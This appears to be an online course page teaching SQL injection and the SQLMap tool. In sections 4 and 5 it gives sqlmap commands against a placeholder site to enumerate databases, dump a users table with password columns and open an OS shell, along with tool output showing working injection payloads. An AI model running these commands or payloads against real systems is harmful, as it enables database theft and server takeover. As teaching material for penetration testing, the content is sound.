💉SQL Injection

Welcome to this course on SQL Injection and SQLMap Usage. SQL Injection is a type of attack that is used to exploit vulnerabilities in web applications that rely on SQL databases. In this course, we will cover the basics of SQL Injection, the different types of SQL Injection attacks, and how to use SQLMap, an open-source penetration testing tool, to detect and exploit SQL Injection vulnerabilities.

Table of Contents

• Section 1: Understanding SQL Injection

• Section 2: Types of SQL Injection Attacks

• Section 3: Introduction to SQLMap

• Section 4: Using SQLMap to Detect SQL Injection Vulnerabilities

• Section 5: Using SQLMap to Exploit SQL Injection Vulnerabilities

• Conclusion

Section 1: Understanding SQL Injection

In this section, we will cover the basics of SQL Injection. We will start with an overview of SQL, followed by an explanation of how SQL Injection attacks work.

1.1 Overview of SQL

SQL (Structured Query Language) is a programming language that is used to manage and manipulate data in relational databases. SQL is used to perform tasks such as creating, modifying, and deleting tables, as well as querying data from those tables.

1.2 How SQL Injection Attacks Work

SQL Injection attacks work by exploiting vulnerabilities in web applications that rely on SQL databases. These vulnerabilities allow an attacker to insert malicious SQL code into a web application's SQL query, which can result in the attacker gaining unauthorized access to sensitive data, modifying or deleting data, or even taking control of the entire web application.

Section 2: Types of SQL Injection Attacks

In this section, we will cover the different types of SQL Injection attacks that an attacker can use to exploit vulnerabilities in web applications.

2.1 Error-based SQL Injection

Error-based SQL Injection is a type of SQL Injection attack that relies on causing an error in the web application's SQL query. This error can then be used by the attacker to extract information from the database.

2.2 Union-based SQL Injection

Union-based SQL Injection is a type of SQL Injection attack that uses the SQL UNION operator to combine the results of two or more SELECT statements. This attack can be used to extract data from the database or even perform more advanced attacks.

2.3 Blind SQL Injection

Blind SQL Injection is a type of SQL Injection attack that does not rely on the web application returning error messages. Instead, the attacker uses conditional statements to infer the data in the database.

Section 3: Introduction to SQLMap

In this section, we will introduce SQLMap, an open-source penetration testing tool that is used to detect and exploit SQL Injection vulnerabilities.

3.1 What is SQLMap?

SQLMap is a command-line tool that automates the process of detecting and exploiting SQL Injection vulnerabilities in web applications. It supports a wide range of databases and can be used to perform a variety of attacks.

3.2 Installing SQLMap

SQLMap can be installed on a variety of platforms, including Windows, Linux, and macOS. Detailed installation instructions can be found on the SQLMap website.

Section 4: Using SQLMap to Detect SQL Injection Vulnerabilities

In this section, we will cover how to use SQLMap to detect SQL Injection vulnerabilities in a web application.

4.1 Basic Usage of SQLMap

To use SQLMap, we first need to specify the target URL of the web application we want to test. We can do this using the following command:

sqlmap -u http://example.com/page.php?id=1

This command tells SQLMap to test the URL http://example.com/page.php?id=1 for SQL Injection vulnerabilities.

4.2 Advanced Usage of SQLMap

SQLMap offers a wide range of options that can be used to customize the testing process. For example, we can use the --dbs option to enumerate the databases that are present on the target system:

sqlmap -u http://example.com/page.php?id=1 --dbs

This command tells SQLMap to enumerate the databases on the target system.

Section 5: Using SQLMap to Exploit SQL Injection Vulnerabilities

In this section, we will cover how to use SQLMap to exploit SQL Injection vulnerabilities in a web application.

5.1 Basic Exploitation with SQLMap

To exploit a SQL Injection vulnerability with SQLMap, we first need to identify the vulnerable parameter. We can do this using the --dbs option:

sqlmap -u http://example.com/page.php?id=1 --dbs

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.7.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:20:56 /2023-03-02/

[12:20:56] [INFO] resuming back-end DBMS 'mysql' 
[12:20:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1157=1157

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 2172 FROM (SELECT(SLEEP(5)))GNCU)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3239 UNION ALL SELECT NULL,CONCAT(0x716b6a7171,0x66496f4d694e56706f706c724644575646666979495642714f5357436b414455655172456345765a,0x7176717871),NULL-- -
---
[12:20:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
[12:20:57] [INFO] fetching database names
available databases [2]:
[*] dbname
[*] information_schema

[12:20:57] [INFO] fetched data logged to text files under '/sqlmap/output/example.com'

[*] ending @ 12:20:57 /2023-03-02/

Once we have identified the vulnerable parameter, we can use the --dump option to dump the contents of a database.

This command tells SQLMap to dump the contents of the database dbname:

sqlmap -u http://example.com/page.php?id=1 -D dbname --dump

We can also navigate in the database, for example if we want to tables:

sqlmap -u http://example.com/page.php?id=1 -D dbname --tables

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:24:47 /2023-03-02/

[12:24:47] [INFO] resuming back-end DBMS 'mysql' 
[12:24:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1157=1157

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 2172 FROM (SELECT(SLEEP(5)))GNCU)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3239 UNION ALL SELECT NULL,CONCAT(0x716b6a7171,0x66496f4d694e56706f706c724644575646666979495642714f5357436b414455655172456345765a,0x7176717871),NULL-- -
---
[12:24:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
[12:24:51] [INFO] fetching tables for database: 'dbname'
Database: dbname
[2 tables]
+-----------+
| id        |
| users     |
+-----------+

[12:24:51] [INFO] fetched data logged to text files under '/sqlmap/output/example.com'

[*] ending @ 12:24:51 /2023-03-02/

Assuming you found a table named users we can navigate to that one to see the content of these table.

sqlmap -u http://example.com/page.php?id=1 -D dbname -T users --columns

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.7.2#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:27:06 /2023-03-02/

[12:27:06] [INFO] resuming back-end DBMS 'mysql' 
[12:27:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1157=1157

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 2172 FROM (SELECT(SLEEP(5)))GNCU)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3239 UNION ALL SELECT NULL,CONCAT(0x716b6a7171,0x66496f4d694e56706f706c724644575646666979495642714f5357436b414455655172456345765a,0x7176717871),NULL-- -
---
[12:27:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
[12:27:07] [INFO] fetching columns for table 'users' in database 'dbname'
Database: dbname
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

[12:27:07] [INFO] fetched data logged to text files under '/sqlmap/output/example.com'

[*] ending @ 12:27:07 /2023-03-02/

To dump the users table use:

sqlmap -u http://example.com/page.php?id=1 -D dbname -T users --dump

5.2 Advanced Exploitation with SQLMap

SQLMap offers a wide range of options that can be used to perform more advanced attacks. For example, we can use the --os-shell option to obtain a shell on the target system:

sqlmap -u http://example.com/page.php?id=1 --os-shell

This command tells SQLMap to obtain a shell on the target system.

Conclusion

In this course, we have covered the basics of SQL Injection, the different types of SQL Injection attacks, and how to use SQLMap to detect and exploit SQL Injection vulnerabilities. It is important to remember that SQL Injection is a serious threat to web applications, and it is essential that developers take steps to secure their applications against this type of attack. By understanding SQL Injection and how it can be exploited, we can better protect ourselves and our organizations from this type of attack.